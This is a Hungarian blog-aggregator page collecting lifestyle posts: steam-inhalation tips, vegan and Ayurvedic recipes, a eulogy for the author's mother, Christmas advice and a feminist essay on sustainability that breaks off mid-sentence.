mindenféle légúti megbetegedés esetén. Már nagyanyáink is rendszeresen alkalmazták, mint a megfázás egyik legjobb gyógymódját. Nem csak megfázás és influenza esetén jó, de arcüreggyulladás, asztma, köhögés, hörghurut gégegyulladás, tüdőgyulladás és mindenféle vírusos és bakteriális légúti betegségek esetén ideális. Az inhalálás kitűnő megoldás a légutak megnyugtatására, tisztítására, gyulladás csökkentésére, köhögés csillapítására, feloldja a letapadt váladékot, megszünteti az orrdugulást a fejben lévő feszítő érzetet. Hogyan végezd Egy edénybe tegyél fel vizet forrni. Amikor felforrt, vedd le a tűzről, hagyd kicsit hűlni - ne legyen túl forró, mert sérüléseket okozhat - majd csepegtess bele néhány csepp illóolajat. Hajolj az edény fölé és egy nagyobb törölközőt helyezz a fejedre, egyfajta sátrat képezve. Lélegezd be a meleg gőzt, hogy jól átjárja a légutakat. Az inhalálást végezd kb. 5-10 percig. Utána ne érje a légutakat, a tüdőt hideg levegő... ne menj ki hidegbe és a lakásba se engedj magadra 1-2 óráig hideg levegőt. Az inhaláláskor a gyógynövények közvetlenül a légutakba, tüdőbe jutnak így nagyon hatékonyan fejtik kihatásukat. Én személy szerint egy ájurvédikus légzéskönnyítő illóolaj keveréket használok, de ha otthon nincs ilyened, akkor különböző illóolajok vagy azok általad készített keveréke is jó. Kiváló gyógynövények, illóolajok inhaláláshoz borsmenta, eukaliptusz, kámfor, fahéj, szegfűszeg, kakukkfű, hárs, Jó egészséget kívánok:) szeretettel Kati
Ajándékkönyv - Vegetáriánus kalandozások a magyar konyhában - teljes verzió
Azt mondják, minden rosszban van valami jó. A koronavírus terjedése kapcsán tapasztalt összefogás, az emberek segítő szándéka az utóbbi napokban nagyon megható számomra. Vannak, akik lakást adnak egészségügyi dolgozóknak, másik sétáltatni viszik idős emberek kutyáit, bevásárolnak, gyógyszertárba...
extra proteines édes omlett
2020. január 23. Beautilicious
A fehérjedús reggeli nem áll meg ott, hogy tojásrántotta, tükörtojás, főtt tojás, és ezek már nagyon unt változatai. Hoztam egy szuper egyszerű receptet az édesszájúaknak is, amit még egy sietős reggelen is 5-10 perc alatt össze lehet dobni. Általánosságban azért reggel ajánlott inkább lassú felszívódású szénhidrátot fogyasztani, hogy később éhezzünk meg, erre az IR-esetnek sajnos oda kell figyelni, de nekik is bátran ajánlom egy tízórai gyanánt. Hozzávalók - 1 adag fehérjepor ( nálam csokis nutriversum) - 1 egész tojás - 2 tojásfehérje - nálam 150gramm bogyós gyümölcs Ezekkel nincs más dolgod, mint összekeverni és kisütni serpenyőben egy kevés zsiradékon. Jó étvágyat hozzá!
Drága Édesanyám eltávozott...
2019. december 13. Élj harmóniában
Valamikor talán 1,5 évvel ezelőtt egy jóga elvonuláson, az egyik jógás tanulóm kérdezte tőlem mit csinálnék, ha Édesanyámmal történne valami.... akkor azt mondtam neki, hogy intelligenciával tudom mit tennék, de igazából ez csak a valós élethelyzetben derül ki. A jóga az elméleti tudást nem tartja tudásnak, kizárólag az a tudás ér valamit amit a gyakorlatban megvalósítottunk... a kkor még nem gondoltam, hogy az élet ilyen rövid időn belül fog tesztelni... Édesanyám 2019. november 7-én hagyta el a testét és tegnap december 12-én volt a temetése.. A test elhagyása azoknak akik itt maradnak részben egy fájó hiány, de nekünk vaisnaváknak (ez egy hindu vallás) egy időben öröm is, mert tudjuk, hogy a lélek elhagyva a testet, ha megfelelő életet élt, halad tovább az útján egy jobb élet felé. Hálás vagyok Istennek, Krisnának azért, hogy megfelelő tudásom van, volt ahhoz, hogy ezt a folyamatot értsem, kezeljem, feldolgozzam és támogassam az Édesanyámat ezen az úton. Hálás vagyok azért is, hogy az utolsó időszakban sokat lehettünk együtt az Anyukámmal és azért is, mert még a közös elbúcsúzás lehetőségét is megkaptuk. Hálás vagyok a sok támogatásért, megannyi imáért amit a környezetemben lévő kedves ismerősöktől és a bhaktáktól kaptam. Különös kegynek érzem, hogy akármikor eszembe jut az Édesanyám vagy az elmúlt hónapok történései, elönt valamiféle melegség, békével és szeretettel a szívemben gondolok Édesanyámra. A temetésére írtam egy búcsúztatót és szeretném, hogy mindenki tudja, hogy ő milyen jó Anya és jó ember volt, ezért végül úgy döntöttem megosztom veletek... Mindenki tudja, aki egyszer megszületik, az el is távozik... ez az élet rendje, de mindig marad egy hiány, egy űr az eltávozott után azokban, akik szeretik. Drága Édesanyám 74 éves korában hagyta el a testét... Hogy milyennek láttam őt? Segítőkész, gondoskodó, szeretetteljes, kedves, türelmes, elfogadó, jó eszű, kitartó ember volt jó humorral és némi kritikus hajlammal megáldva. Segített ahol tudott, törődött, gondoskodott, ápolt, támogatott, jó tanácsokat adott, érdeklődött, inspirált, vigasztalt, etetett. ölelt és szeretett. Nehéz gyermekkora ellenére nagyon gondoskodó Feleség és Édesanya lett, akinek a család volt a legfontosabb. Mintát adott arról, milyen amikor valaki a saját igényeit, vágyait, lehetőségeit háttérbe helyezi azért, hogy a családját, férjét, gyermekeit szolgálja, róluk gondoskodjon. Saját magának a legolcsóbb dolgokat vette, míg nekünk a gyermekeinek igyekezett mindenből a legjobbat adni. Akármilyen késő este volt, nem törődött a saját fáradtságával, ha valaki a családból megkívánt valami finomságot, ő akár este 9 órakor nekikezdett sütni, főzni. Sütött, főzött, eltett, befőzött és etetett... etetett mindenkit sok sok finomsággal - sokszor úgy, hogy neki már nem is jutott. Ki nem emlékezne a finom ételeire amiket készített, süteményeire, lekvárokra, szörpökre. Azt hiszem számára a legnagyobb boldogság az volt, hogy gondoskodhatott. Nem csak családja részesült a szeretetteljes gondoskodásában, hanem minden elesett lélek felé szeretettel és törődéssel fordult... a barátokat, ismerősöket tanácsokkal látta el, segített mindenkinek, etette a kóbor kutyákat, cicákat, az éhező madarakat, segítette a hajléktalanokat is. A legnagyobb télben is kitipegett a madáretetőhöz, hogy a kismadarak nehogy éhezzenek, és az üvegen keresztül leste a házból, amint jóllakik a környék összes madara. Nem csak törődött, de végtelenül hálás volt a törődésért, a kedvességért, amit kapott másoktól, különösen az utolsó időszakban, amikor segítségre szorult. Szeretett tanulni, tudásra vágyott minden életterületen... amikor egy ismeretlen fajtájú madarat látott sietett a madárhatározóhoz és próbálta azonnal megkeresni ki az új kis jövevény. Szerette a rejtvényeket, a logikát, a történelmet, a politikát, gazdaságot, mindent ahol kamatoztathatta éles eszét és lényeglátását. Széles körű ismereteinek köszönhetően bárkivel, bármiről el tudott beszélgetni, nagyon kommunikatív volt. Egyszerűen, szerényen élt, nem vágyott a külsőségekre, nagy dolgokra. Volt hajlama a búskomorságra, de minden apró dolognak tudott örülni... egy szál virágnak, egy szép gombának, egy kismadár röptének vagy egy akciós pogácsának. Szerette a szépet, a természetet és a művészeteket - különösen a verseket. Kiváló memóriájának köszönhetően még az utolsó néhány hónapban is tökéletesen idézett megannyi verset. Sokszor egy élethelyzetben a véleményét, tanítását egy-egy odaillő idézettel hozta tudtomra. Szeretetteljes gondoskodása mellett kitartás és stabilitás jellemezte A dolgokat lassan, nyugodt tempóban, türelmesen és átgondoltan csinálta - lassan döntött, lassan sétált - pici gyerekként mindig türelmes volt velünk, soha nem sürgetett, türelmetlenkedett... fiatal lányként zavart, hogy lassan ment az utcán, később magam is rájöttem ugyan hová sietnék... Édesanyám megfontolt és megbízható volt, egész életemben számíthattam rá. Az élethelyzetekben kitartóan helytállt, amit egyszer elhatározott azt nem adta fel. Kedvenc mondása ,, Az én hátamon fát lehet vágni... és lehetett is... mindent türelmesen tűrt, elviselt, tolerált. Életében sok nehéz pillanatot élt át, de ő kitartott minden körülményben. Szeretett gyűjtögetni, felhalmozni és alapvetően ragaszkodott mindenhez, de még 70 év felett is volt benne nyitottság, képes volt új dolgokat kipróbálni. Még ájurvédikus méregtelenítő kúrát is tartott. Számomra nem csak az Édesanyám volt, de a legjobb barát is, akivel kislány korom óta szinte mindent meg tudtam beszélni. Még 14 évesen is értem jött az iskolához és kikérdezett milyen napon volt, hogy érzem magam. Osztozott minden örömömben és bánatomban. Felnőttként is szinte naponta beszéltünk telefonon és Édesanyám is mindig megosztotta velem az örömeit és bánatait. Egész életében hívő ember volt, különösen az utolsó hónapokban naponta imádkozott Istenhez és ez sok erőt adott neki. Eltávozásakor elfogadta Isten akaratát, nyugodt és békés hangulatban hagyta el ezt a világot. Drága Édesanyám, bárcsak az Úr megáldana minden tekintetben. Nagyon fogsz hiányozni, ami természetes, imádkozom, hogy a lelked haladjon a maga útján és közelebb kerülj Istenhez. Köszönöm, hogy Te voltál az Édesanyám és köszönök mindent, amit kaptam Tőled, a megannyi szeretetet, törődést, türelmet, kedvességet. Örökké hálával és szeretettel fogok gondolni Rád. Kislányod Kati
Tudatos felkészülés a Karácsonyra
2019. november 30. Élj harmóniában
K ö zeledik a december, a karácsonyi készülődés ideje. A karácsony, szokták mondani a szeretet és béke ünnepe. Sajnos a mai társadalomban ez az időszak sokak számára nem annyira békéről, megnyugvásról, szeretetről szól, hanem túlvállalásról, pörgésről, sok kiadásról, aggodalmakról, feszültségről. Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet. Hagyj időt magadnak a kikapcsolódásra, mert a legszebb ajándék, amit adhatsz a családodnak, barátaidnak, az a személyes társaságod, az hogy kedves, kipihent, nyugodt, türelmes, toleráns és szeretetteljes vagy. Ha visszaemlékszünk az előző évek karácsonyaira, arra általában senki nem emlékszik milyen volt a menü, vagy mi volt az ajándék, esetleg a csomagolás vagy éppen a fa díszítése, de ha karácsonykor feszültség van, esetleg veszekedés, arra akár évekig is mindenki visszaemlékszik. Ne engedd, hogy a karácsonyi készülődés a külsőségekről szóljon. A karácsony olyan időszak, amikor lehetőségünk van kicsit befelé figyelni, egyensúlyra törekedni és ilyenkor fókuszba kerülnek az emberi kapcsolatok, a szeretet. A karácsony előtti időszakban sokan vállalják túl magukat, akár túl sok tenni való elvégzésével vagy a túl nagy anyagi terhek felvállalásával. Sok sok éves statisztikai támasztja alá, i lyenkor többszöröse mennyiségű élelmiszert és nagyon sok felesleges használati- és dísztárgyat vásárolunk, továbbá sokkal több vizet, áramot és gázt használunk. Karácsonykor még a tudatos, környezetbarát emberek is könnyelműek, könnyebben pazarolnak vagy esetleg kicsit meggondolatlanabbul költekeznek. Légy tudatos karácsonykor is:) Annak érdekében, hogy a karácsonyi készülődés gördülékenyen menjen néhány praktikus tanáccsal szeretnénk a segítségetekre lenni. Ez a néhány tanács segít, hogy az ünnepi időszakot tudatosabban, kevesebb energia és pénz elhasználásával tudjátok megélni. Tervezz meg mindent alaposan előre. Írd össze a feladatokat, vedd sorra mit, mikor, hol és mennyiért szeretnél beszerezni. Azokat a feladatokat amiket lehet, próbáld átadni valakinek a családban. A többi feladatot, vásárlást nézd meg hogyan tudod leghatékonyabban összekötni - pl. egy adott helyen vásárolsz több dolgot. Ne kapkodj, ne rohanj. A rohanással nem nyerhetsz túl sok időt, viszonyt sok lesz az idegesség miatt elvesztegetett energia. Fáradtan, kimerülten kevésbé tudsz koncentrálni és könnyebben leszel türelmetlen, ingerlékeny. A feladatokat és a programokat úgy oszd be, hogy maradjon időd regenerálódni, kikapcsolódni. Tervezd meg azt is, hogyan fogsz feltöltődni, kikapcsolódni a karácsonyi készülődés időszakában. Ne ajándékozz felesleges dolgokat, gondold át jól, valóban szükség van-e arra, amit ajándéknak szánnál. Ajándékozhattok baráti körben akár otthon megunt tárgyakat, vagy saját kezűleg készített meglepetést is. Utóbbi kevesebbe kerül és sokkal személyesebb is. A jándék vásárlásnál, részesítsd előnyben az élmény ajándékokat. Számos statisztika kimutatta, hogy az emberek jobban örülnek az élményeknek, mint a tárgyaknak. Ajándékozz utazást, színházjegyet, jóga bérlet, masszázs, etc. Amennyiben valamilyen terméket szeretnél ajándékozni, elsődlegesen olyan terméket vásárolj, ami nem terheli a környezet, és akinek adod, annak az egészségre nem káros. Kerüld el a csomagolást. Ez az egyik legnagyobb pazarlás karácsonykor. Ha csomagolni szeretnéd az ajándékot, válassz natúr papírszatyrot, újságpapírt vagy újrahasznosított papírból készült csomagolóanyagokat. Ú j díszek vásárlása helyett, megunt díszeidet cserélgesd barátaiddal és készíts új díszeket természetes alapanyagokból - papírból, fából, termésekből, textíliából, otthoni újrahasznosítható dolgokból, pattogatott kukoricából, etc. Karácsonyi világításnál alkalmazz hagyományos megoldásként gyertyákat. A karácsonyi menüt friss, egészséges, vegyszermentes (bio) alapanyagokból készítsd el és annyit ételt főzz, amennyit jólesően el is fogyaszt a család. Karácsonykor sajnos nagyon sokan túl eszik magukat és januárban az évet az orvosnál kezdik. Törekedj a mértéktartó étkezésre és a minőségi ételek fogyasztására, hogy jól indulhasson az éved:) Állíts cserepes fenyőt - vagy ma már papír fenyőket is tudsz beszerezni. Kerüld el a műanyagfenyőket és a kivágott fákat is, mert sajnos egyik megoldás sem környezetbarát. Tölts sok időt szeretteiddel, békében, nyugalomban. Szervezzetek közös programot, sétáljatok a szabadban, gyönyörködjetek a természetben vagy menjetek korcsolyázni, társasjátékozzatok. A lényeg, hogy együtt legyetek:) Mindenkinek boldog, békés, szeretetteljes ünnepeket kívánok:)
Vegán somlói
Recept bátraknak
Ezt azoknak, akik nem riadnak vissza egy recepttől, ha az több, mint három lépésből áll. No, meg azoknak, akik valami megveszekedett finomat akarnak enni. Vegánul. :)
Aratni fogtok!
u.i. Amúgy az elkészítés SOKKAL egyszerűbb, mint a leírása. ;) Ne csüggedj, meglátod, megéri! Lesz három piskótalapod, három krémed, ezeket rétegesen lerakod, hagyod összeérni, és tiéd a mennyország!
Szóval, vegyél egy levegőt. Aztán elő három keverőtálat. :)
Ez (háromszor) mindegyikbe tedd bele:
- 50 g liszt
- 20 g keményítő (1 ek)
- 1 mk sütőpor
- 1 mk szódabikarbóna
- 40 g nádcukor 2 ek (a vaníliásba fehér)
- 1 csipet vaníliapor
Majd jöjjön a következő nedves rész mindhárom fajta tésztába. Jól keverd össze, aztán keverd vele simára a száraz lisztes keveréket.
- 1 dl víz
- 1 ek citromlé
- 1 kk almaecet
- 3 ek étolaj
Eddig mind a három tálban ugyanaz van. Most jön az, az egyikből lesz kakaós, a másikból diós, a harmadikból meg vaníliás piskóta. Ezért fajtánként tegyél bele:
- 10 g kakaó (1 ek)
- 15 g dió
- 2 csipet kurkuma, 1 csipet pirospaprika (igen! és semmi vész! Azért ne csípőset válassz.)
A három tésztád kész, most süsd ki. Szükséged lesz három hasonló formára, és egy 180 fokos sütőre. 20 percet alatt jó.
Közben készítsd el az önteteket. Ehhez megint három edény kell.
Az egyikben forrald össze a szirupot: 100 ml vízben oldj fel 1 kk fehércukrot és reszeld bele a fél narancs héját. Finom illata lesz! :) Ha megvagy, zárd el, keverj el benne 1 mk rumaromát és takard le. A rumaroma helyett választhatsz igazi sütőrumot is, de fontos, hogy csínyján bánj mindkettővel. A rumtól max. jó kedvetek lesz, de a túltolt rumaroma nagyon el tudja rontani az édességeket.
A második öntethez egyszerűen melegítsd össze a 90g étcsokit 50 ml növényi tejjel.
A harmadik legyen a vaníliakrém. Ehhez 300 ml növényi tejben keverj el 12 g keményítőt, 50 g fehér cukrot és egy csomag vaníliás cukrot. Csavarj bele fél narancs levét és színezd meg szép sárgára 2 csipet kurkumával + 1 csipet pirospaprikával (nyugtatás ld. mint fenn).
Most már csak a szórás hiányzik, ami legyen 100 g durvára tört dió és 75 g mazsola. A mazsolát 1 mk rumaromával ízesített vízbe áztasd be előtte.
Az összeállítás van hátra. A jó az, hogy egyáltalán nem kell szépnek lennie. Rétegezd le az egészet, és a somlóid magától lesz majd döglesztő.
Először a diós lapot a sütőformában szurkáld meg, vagdosd be, majd a szirup kb. harmadával locsold meg. Kend rá a vaníliakrém felét, szórd meg a dió és mazsola felével, öntsd rá a csokiöntet negyedét.
Erre fektesd rá a csokis réteget, ezt is szurkáld meg, majd locsold meg a szirup másik harmadával.
Kenegesd el rajta a vaníliakrém másik felét, szórd rá a maradék diót és mazsolát és kanazz még rá egy kis csokis öntet is.
Most jön a vaníliás piskóta. Itt már tudod, mit kell csinálni. :) Ráteszed, megszurkálod, majd meglocsolod a maradék sziruppal. A többi már megy magától. Fontos, hogy letakard az egészet, majd egy éjszakára hűtőbe tedd. Ezalatt megtörténik a csoda, összeáll a somlóid, az ízek találkoznak, táncot járnak, minden együtt lesz a szádban harmóniában, meglásd.
Másnap már csak egy evőkanállal ügyesen szaggasd ki egy szép tálba, csorgasd meg csokival, és ha igazi hedonista vagy, szerezz hozzá vegán tejszínhabot!
Áldd meg magadat, amiért nem riadtál vissza a recept leírásától, végigvitted a művedet! Kínálj meg, akit tudsz, aztán söpörd be a bókokat! Na, dagad már a melled? :)
Jó étvágyat!
Elkészítési idő: abszolút nem érdekes ;)
Ez egy vegán recept volt. :)
Hasonló recepteket ITT találsz még.
Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :)
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat!
Vegán Szaloncukor-készítő
Kezdő Vegán
Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood
Gőzgombóc (Germknödel)
Síparadicsomok jellegzetes étele. Aki járt már hegyi menedékházban, hüttében, egészen biztosan kóstolta már a szilvalekvárral töltött, édes mákkal megszórt, vaníliasodóban tálalt gombócot. Hozzávalók: A tésztához: 40 dkg finomliszt 2 dkg friss élesztő 3 dkg cukor 2 dkg olvasztott vaj egy...
Édes-savanyú póréhagyma “feta” sajttal (laktózmentes, gluténmentes, vegán)
2019. október 11. Zizi kalandjai
Póréhagyma, mint köret? Miért ne? Nem egy túl gyakori zöldség, hagymaféle a köretek terén, pedig ebben az ételben királyi szintre emelkedik. Olyan főszereplő lesz, aki a megterített asztalnál magára vonja a tekinteteket. Remélem felcsigáztalak benneteket annyira, hogy legfőbb vágyatok az legyen, hogy elkészítsétek ezt az ételt a hétvégén. Mert egyszerű. Mert hihetetlenül finom. Source
Fügés-mandulás rétes
A rétest ma már a háziasszonyok többsége előre elkészített réteslapokkal vagy leveles tésztával készíti. Volt szerencsém életemben megnézni és részt venni az igazi házi rétes készítésében, de a tény, hogy az előre elkészített réteslappal nagyobb szerencsével járok és rövidebb idő alatt biztosabb a sikerem, még nem bírt rá, hogy magam is kipróbáljam házilag a tésztát összeállítani és nyújtani. Talán majd egyszer.
A rétes feltehetően a törököknek köszönhetően hódoltságuk ideje alatt került magyarok lakta területre. Mivel a törökök akkori baklava-szerü süteménye túl édes volt, így a magyar háziasszonyok eleinte 10-12 lapot sütöttek ki egymásra rakva a forró kemencékben, s azokat töltelék nélkül feldarabolva, porított cukorral meghintve tálalták. A mai formájú feltekert, töltött rétes a 18-19. század fordulóján alakult ki az Osztrák-Magyar Monarchia területén. A párizsi Ritz Hotel étlapján a 19. század elején szerepelt a ,,Rétes Hongrois, melynek elkészítéséhez a réteslisztet Magyarországról rendelték és a cukrászokat Pestre küldték tanulni. (forrás: Vétek György: Rétesshow a kastélyban, hvg.hu, 2007. augusztus 11; Sütemények, tészták könyve, Budapest, 1988, Vianco Stúdió)
Még sok helyen fellelhető füge, nem csak piacokon, üzletekben, de telkeken, kertekben álló fügefákon is. Emlékszem, amikor Budán laktunk, a lakóházunk végében állt egy hatalmas fügefa, még novemberben is szedtem róla finom gyümölcsöt. Nagy örömömre szolgál ma is, ha lehetőségem van friss fügét enni. Ennek hiányában aszalt fügét is felhasználhatunk az alábbi recepthez, amelynek az alapja ugyan reszelt alma, de a füge markáns ízének köszönhetően ezt alig érezni benne.
A recept
Hozzávalók:
- 4 réteslap
- vizes konyharuha
- olaj
- 3 alma
- 1 bögre füge (aszalt is jó) apróbbra vágva
- 1/2 bögre maroknyi datolya vagy mazsola
- 1 bögre mandula
Elkészítés:
A datolyát vagy mazsolát meleg vízben megáztatjuk. Éppen csak ellepje a víz a gyümölcsöt. A mandulát megöröljük vagy megdaráljuk. Az almákat lereszeljük vagy gyorsaprítóban darabosra őröljük. A réteslapokat vizes konyharuhára fektetjük, majd mindegyik lapot (kivéve a legfelsőt, amit majd megtöltünk,) egyesével olajjal megkenjük (erre a célra kapható ecsetet használunk) és így helyezzük egymásra. Az utolsó lapot, amit megtöltünk, nem szükséges megkenni.
A megáztatott datolyát vagy mazsolát kézi turmix-szal kicsit összedolgozzuk majd az így keletkezett édes szószt az almával összekeverjük.
A réteslapra egy csíkban a széléhez közel először ráhelyezzük a datolyával vagy mazsolával összekevert almát, majd ennek tetejére egyenletesen rászórjuk a fügét, végül megszórjuk a megdarált mandulával. Akik édesebb szájúak, a megdarált mandulát elkeverhetik a fentiek során leírt mandulaszósszal, vagy más édesítővel, mint gyümölcscukor.
A vizes konyharuha segítségével a rétest felsodorjuk, majd sütőlapra tesszük. Sütés előtt kis olajjal a rétestekercset megkenjük. Kb. 20 perc alatt aranybarnára sütjük.
Őszi ízeket idéző vendégváró falatok, amelyeket akár reggelire is fogyaszthatunk. Én így (t)ettem.
Zöldbabos indiai subji (szabdzsi)
2019. szeptember 22. Élj harmóniában
A zöldbab az ájurvédában édes, hűsítő, fanyar,hatású, emeli az agnit( az emésztés tüzét), de ha túl sokat ezsel belőe megzavarja a vata-t. Gázosodást és székrekedést okozhat. Önmagában a zöldbab, emeli a vata-t, de a római kömény, asafoetida és a bors segít ezt kompenzálni. Vata alkatúaknak, csak mértékkel ajánlott. Jótékonyan hat a torokra, tüdőre és a pitta rendellenességekre. Fogyaszthatod rizzsel, purival, chapatival (lepénykenyér receptet itt találod). Hozzávalók 4 csésze zöldbab felvágva 2 ek ghí vagy olaj 1/2 tk fekete mustármag 1/2 tk római kömény 1/2 tk masala por (ez egy fűszerkeverék indiai boltokban kapható) egy csipet asafoetida 1/4 tk kurkuma 1/2 tk só Paszta 1 tk kókuszreszelék 2 ek. friss korianderlevél összevágva 1 kis darab gyömbér apróra vágva Vegyszermentes (bio) alapanyagokat használj! A zöldbabot mosd meg, vágd le a végeit és a vágd kis darabokra. Készíts pasztát a kókuszból, korianderből és gyömbérből aprító segítségével. A ghít (vagy olajat) egy edénybe hevítsd fel közepes lángon, majd tedd bele a mustármagot, a római köményt, pirítsd picit, majd add hozzá az asafoetidát, a masala fűszert és a kurkumát. Keverd meg a fűszereket, hogy piruljanak és add hozzá a pasztát, a sót és a zöldbabot. Keverd meg alaposan, fedd le és takarékon főzd amíg puha nem lesz, (kb 10 perc) . Tálalhatod kurkumás baszmati rizzsel vagy chapatival. felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Édeskrumpli masala
2019. szeptember 13. Vegavarázs
Hozzávalók: 2 ek ghí vagy olaj 1,5 kk fekete mustármag 5-6 curry levél 2 db szegfűszeg egy kis darab egész fahéj 1/2 kk aszafoetida 1/2 kk kurkuma 1,5 kk őrölt koriander egy csipet őrölt csili 80 dkg megtisztított, kockára vágott édeskrumpli 2 dl víz 2 kk só egy csokor korianderlevél apróra vágva A...
A magas minőségre vágyók igényei miatt szabadulhattak el a zöldségárak
Nem a termelés mennyiségével van összefüggésben a jelentős, esetenként 70 százalékos áremelkedés, állítja a Világgazdaság szakértője.
Sárgabarackos mazsolás csatni (chutney)
2019. július 28. Élj harmóniában
A csatni (chuetney), ami feldobja az ételed, segíti az emésztést:) Édes, sós, csípős, savanyú mindez egyben:) Kiváló étvágycsináló, emésztést segítő és segít kiemelni az ételek ízét. Minden ételt élvezetesebbé tesz. Az ájurvéda és az indiai konyha szinte minden étkezéshez készít valamilyen csatnit. A csatnikat fogyaszthatod melegen vagy hidegen is. Sárgabarackos mazsolás csatni (chuetney) Már néhány chuetneyi receptet közzé tettem a blogon - Szilva csatni itt olvasható az Alma csatnit pedig itt találod , ez pedig egy finom paradicsom csatni. és egy nyári hűsítő friss kókuszos koriander csatni recetet is találsz a blogon Az idei Nyári Jóga Elvonuláson sárgabarackos csatnit készítettünk a paprika és cukkini pakorákhoz:) Minden jógatáborban a pakora a legnagyobb siker, ez idén sem volt máshogyan:) Pakora receptéjét itt találod. A sárgabarackos-mazsolás csatni hozzávalói 1 kg sárgabarack 2 ek. ghí (vegán változatban kókuszzsír) 3 ek. citromlé 1 dl víz 1 kis fahájrúd 1/2 tk. kalinji (fekete hagymamag) 1/2 ek finomra reszelt gyömbér 85 g mazsola 1/4 tk. só 1/8 tk. szárított, tört chili ha édesszájú vagy akkor 75 g teljes értékű barna nádcukor Vegyszermentes (bio) alapanyagokat használj! A barackot alaposan mosd meg, magozd ki és vágd vékony szeletekre. A ghít vagy olajat közepes lángon hevítsd fel. A forró zsiradékban tedd bele a fahéjrudat, kalinjit, gyömbért és a chilit. Picit pirítsd meg ( fél perc kb) add hozzá a többi alapanyagot és forrald fel. Majd mérsékelt lángon, folyamatosan kevergetve addig főzd, míg sűrű, fényes, mázas nem lesz. kb 30 perc Fogyaszthatod pakorával vagy bármilyen étel mellé. Melegen vagy hidegen tálalhatod, hűben tárolható néhány napig. Jó étvágyat kívánok:) szeretettel: Kati
A klímaváltozás feminista probléma (is)
A mai, átlag, magyar, heteroszexuális háztartásokban a fenntarthatóság irányába tett törekvések a nőkre hárulnak. A nők veszik észre a problémát (pl. az egyszer használatos nejlonzacskó, műanyag fülpiszkáló, papírzsepi és zacskója környezetszennyező, a gyerek ruhái káros anyagot tartalmazhatnak, a húsos táplálkozás nem fenntartható stb.), a nők keresnek rá megoldást, ők kutatják fel a leggazdaságosabb termékeket hozzá, keresnek és rendelnek vagy varrnak (!) textilzacskókat a bevásárláshoz, szörpöt készítenek bolti üdítő helyett, megtanulnak húsmentesen vagy vegánul főzni, és utána napról napra, hétről hétre el is készítik a növényi ételeket, utánaolvasnak a megfelelő tápanyagbevitelnek, csökkentik az élelmiszerpazarlást, keresnek megoldást a szelektív hulladék tárolásának, összeszervezik a napot, hogy minél kevesebb benzinnel, minél gyorsabban el legyen minden intézve stb. Háztartás és gyereknevelés Alapból a nők azok, akik mindent észben tartanak, mi fog lejárni a hűtőben, mit kell vásárolni, kinek-mikor-hová kell mennie, időpontok, szülinapok, a gyerekkel kapcsolatban kb. mindent... És ehhez még új teher a fenntarthatóság nyomasztó igénye: a legtöbb vegán ember nő, a legtöbb fenntarthatósággal foglalkozó blogger nő, nőkhöz szólnak a posztok, kivéve, ha drága termékekről, pl. napelemekről vagy elektromos autókról van szó. De ezek a nagyobb beruházást igénylő, fenntartható (vagy annak mondott) árucukkek és megoldások még egy dologban hátráltatják a pozitív változást: amíg a megszerzésükről ábrándozik a férfi, addig nem kell tennie semmit. Izgalmas ábrándozni róla, hogy a jövőben meglesz az új autó, vagy az ökoház napelemekkel, még akkor is, ha valójában nem tesz lépéseket annak megszerzéséért. A fenntartható életmód viszont nem mindig menő, izgalmas vagy kényelmes. Legtöbbször pont az ellenkezője, főleg, ha szokásaink tudatos, mindennapi megváltoztatásáról van szó. Arról nem is beszélve, hogy a hagyományos elvű, hetero háztartásokban a férfi termeli a GDP-t, és a magyar nők átlagban még mindig 20%-kal kevesebb fizetést kapnak, mint a férfiak ugyanazokban a beosztásokban. Tehát hiába is ábrándoznának a legújabb, vegán Tesla modellről, reálisabb, hogy többet járjanak tömegközlekedéssel. Ott vannak még a környezetbarát tisztítószerek, amiknek az árai nagyon széles skálán mozognak, és rosszabb esetben a partner meg sem érti, miért kellene a drágábbat megvenni, esetleg még morog is érte. De vannak olcsóbb, de sokkal kevésbé kényelmes/gyors megoldások, amikkel szintén a nőknek van több dolga. Lehet ecettel és szódabikarbónával takarítani, de az közel sem olyan gyors megoldás, mintha csak ráfújja az ember a mérgező, agresszív tisztítószert, és már törölheti is le egyben a vízkövet, a penészt, a zsiradékot és szappanlerakódást. Az átlag férfi megvan a jól megszokott rutinjában, még ha érdekli is valamilyen szinten a klímaváltozás, legyint egyet, hogy majd a világ megoldja. Mintha gyengeség lenne arra törekedni, hogy jobb emberek legyünk, kevesebb káros hatással legyünk a környezetünkre és a bolygóra. És mivel a férfiak kevésbé fogékonyak az önfejlesztésre, nem hiszi, hogy egy ember törekvése is számít, így minimalizálja a saját jelentőségét a problémában/megoldásban. Így a nő az, aki noszogatja a partnerét, mert ő viszont nem akarja kockáztatni a saját és gyermeke jövőjét. Ami miatt a nők gyakran megkapják, hogy mindig “baszogatják” a partnerüket. Shaming Most már állandósult az ún. shaming (szégyenérzet-keltés) a vegán és környezetbarát csoportokban, ha valaki valamit még nem tökéletesen csinál. Ez amortizálja az emberek lelki világát, hiszen bármennyire próbálkozik, sosem fog tökéletesen környezetbarát módon élni. Ez a teher is inkább a nők lelkét nyomja, pedig már alapból túl vannak terhelve. Nemcsak háztartás-felelős, gyereknevelési és fenntarthatósági-manager, főszakács és mindenki lelki támogatója, hanem még egy szar ember is, amiért megveszi a bolti (vegán) jégkrémet, és néha jól meri érezni magát. Mindig, mindent csomagolásmentesen, kimérve kéne megvásárolni az utolsó alapanyagig, természetesen csak hazai termékekből, és otthon elkészíteni házilag, akkor is, ha 6x annyi ideig tart, mert különben ő az oka az egész klímaváltozásnak hirtelen. Kozmetikumok A nők felé sokkal nagyobb elvárásokat támaszt a társadalom, ami az “ápoltságot” és “szépséget” illeti. A kapitalizmus hamar ráérzett arra, hogy ha az emberek (és főleg a nők) rosszul érzik magukat a bőrükben, sokkal több dolgot el lehet nekik adni. A női borotválkozás például ma azért létezik egyáltalán, mert egy borotva cég kitalálta, hogy a nőknek is el kéne adniuk a terméküket. 1915-ben elkezdték hirdetésekben azt állítani, hogy egy nő akkor igazán igényes, ha borotválkozik. Mivel a nők nem úgy néznek ki, mint a modellek a szétretusált képeken (még a modellek sem úgy néznek ki, mint a szétretusált képeken), ezért minden porcikájukra kitaláltak már valamilyen krémet, szérumot, akármit, amitől feszesebbek, vékonyabbak, vastagabbak, sötétebbek, világosabbak lesznek az adott testrészek. Ezek káros anyagokat 